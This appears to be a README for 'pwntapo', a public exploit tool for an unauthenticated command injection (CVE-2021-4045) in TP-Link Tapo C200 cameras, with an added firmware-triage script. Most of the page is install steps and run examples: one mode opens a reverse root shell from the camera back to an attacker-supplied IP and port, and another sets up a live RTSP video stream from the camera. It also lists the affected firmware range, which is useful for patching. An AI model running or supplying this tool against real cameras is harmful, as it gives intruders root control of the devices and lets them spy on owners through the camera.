## https://sploitus.com/exploit?id=8AEB5F76-FDD8-5C1A-A818-24FF5E48CD61
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)"

Read about the exploit on [Exploit-DB](https://www.exploit-db.com/exploits/51017).

This is a command injection vulnerability that affects all TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works, see this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce).
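To triage a camera inventory against the affected range stated above, the following added example (not part of the pwntapo repository) parses firmware strings and classifies each device. It assumes firmware is reported in the form `1.1.16 Build 211209 Rel. 37726N`; the function names and the sample inventory are constructed for illustration.

```python
import re

# First fixed firmware according to this page: 1.1.16 Build 211209 Rel. 37726N
FIXED = ((1, 1, 16), 211209)

# Assumed string shape: "<major>.<minor>.<patch> Build <YYMMDD> Rel. <id>"
FW_RE = re.compile(
    r"^\s*v?(\d+)\.(\d+)\.(\d+)(?:\s+Build\s+(\d{6}))?(?:\s+Rel\.\s*(\w+))?\s*$",
    re.IGNORECASE,
)

def parse_firmware(text):
    """Return ((major, minor, patch), build_or_None), or None if unparseable."""
    m = FW_RE.match(text or "")
    if not m:
        return None
    version = tuple(int(p) for p in m.group(1, 2, 3))
    build = int(m.group(4)) if m.group(4) else None
    return version, build

def classify(text):
    """Return 'affected', 'fixed' or 'unknown' for one firmware string."""
    parsed = parse_firmware(text)
    if parsed is None:
        return "unknown"
    version, build = parsed
    if version != FIXED[0]:
        return "affected" if version < FIXED[0] else "fixed"
    # Same version number: the build date decides; without it we cannot tell.
    if build is None:
        return "unknown"
    return "affected" if build < FIXED[1] else "fixed"

def audit(inventory):
    """Map each device name to its classification."""
    return {name: classify(fw) for name, fw in inventory.items()}

# Constructed sample inventory: device names and most firmware strings are made up.
SAMPLE = {
    "cam-lobby": "1.1.15 Build 211130 Rel. 11111N",
    "cam-dock": "1.1.16 Build 211209 Rel. 37726N",
    "cam-lab": "1.1.16",
    "cam-roof": "1.3.0 Build 220830 Rel. 22222N",
    "cam-gate": "unknown",
}

if __name__ == "__main__":
    for name, verdict in audit(SAMPLE).items():
        print(f"{name}: {verdict}")
```

Devices reported as `unknown` need a manual check, since a bare version number without the build date cannot be placed on either side of the fix.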

## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes: SHELL and RTSP.

## SHELL
In shell mode you only need to provide the victim IP, the attacker IP and the listening port; this spawns a root shell on the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RTSP
In RTSP mode you also need to provide the RTSP_USER, RTSP_PASSWORD and RTSP_CIPHERTEXT to get live footage from the camera.
```shell
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION